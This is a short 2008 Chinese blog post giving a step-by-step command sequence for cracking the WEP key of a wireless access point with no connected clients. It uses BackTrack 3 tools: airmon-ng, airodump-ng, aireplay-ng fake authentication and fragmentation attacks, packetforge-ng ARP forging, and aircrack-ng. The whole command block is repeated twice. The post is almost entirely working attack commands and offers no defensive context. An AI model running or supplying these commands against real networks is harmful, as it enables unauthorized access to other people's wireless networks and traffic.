BT3破解無(wú)客戶端的無(wú)線網(wǎng)絡(luò)
如何獲得破解網(wǎng)卡的基本信息,參考這篇文章
http://m.shnenglu.com/alantop/archive/2008/08/24/59825.html
1. 開(kāi)一個(gè)shell,運(yùn)行如下命令
airmon-ng start rausb0 6
6是路由器所在頻道
airodump-ng --ivs -w name -c 6 rausb0
2. 開(kāi)第二個(gè)shell
aireplay-ng -1 0 -e 【ap的essid】 -a 【ap的mac】 -h 【自己網(wǎng)卡的mac 】rausb0
aireplay-ng -5 –b 【ap的mac】-h 【自己網(wǎng)卡的mac】 rausb0
packetforge-ng -0 -a 【ap的mac 】-h 【自己網(wǎng)卡的mac】 -k 255.255.255.255 -l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp
aireplay-ng -2 –r mrarp -x 128 rausb0
128可以設(shè)置成一個(gè)比較大的值,如果在發(fā)數(shù)據(jù)包的時(shí)候沒(méi)有卡死的話。
3.開(kāi)第三個(gè)shell
aircrack-ng -n 64 -b 【ap的mac】 name-01.ivs
在破解的過(guò)程中,請(qǐng)盡量找信號(hào)比較好的ap破解。
http://m.shnenglu.com/alantop/archive/2008/08/24/59825.html
1. 開(kāi)一個(gè)shell,運(yùn)行如下命令
airmon-ng start rausb0 6
6是路由器所在頻道
airodump-ng --ivs -w name -c 6 rausb0
2. 開(kāi)第二個(gè)shell
aireplay-ng -1 0 -e 【ap的essid】 -a 【ap的mac】 -h 【自己網(wǎng)卡的mac 】rausb0
aireplay-ng -5 –b 【ap的mac】-h 【自己網(wǎng)卡的mac】 rausb0
packetforge-ng -0 -a 【ap的mac 】-h 【自己網(wǎng)卡的mac】 -k 255.255.255.255 -l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp
aireplay-ng -2 –r mrarp -x 128 rausb0
128可以設(shè)置成一個(gè)比較大的值,如果在發(fā)數(shù)據(jù)包的時(shí)候沒(méi)有卡死的話。
3.開(kāi)第三個(gè)shell
aircrack-ng -n 64 -b 【ap的mac】 name-01.ivs
在破解的過(guò)程中,請(qǐng)盡量找信號(hào)比較好的ap破解。
posted on 2008-09-02 03:06 AlanTop 閱讀(1736) 評(píng)論(0) 編輯 收藏 引用 所屬分類: 計(jì)算機(jī)應(yīng)用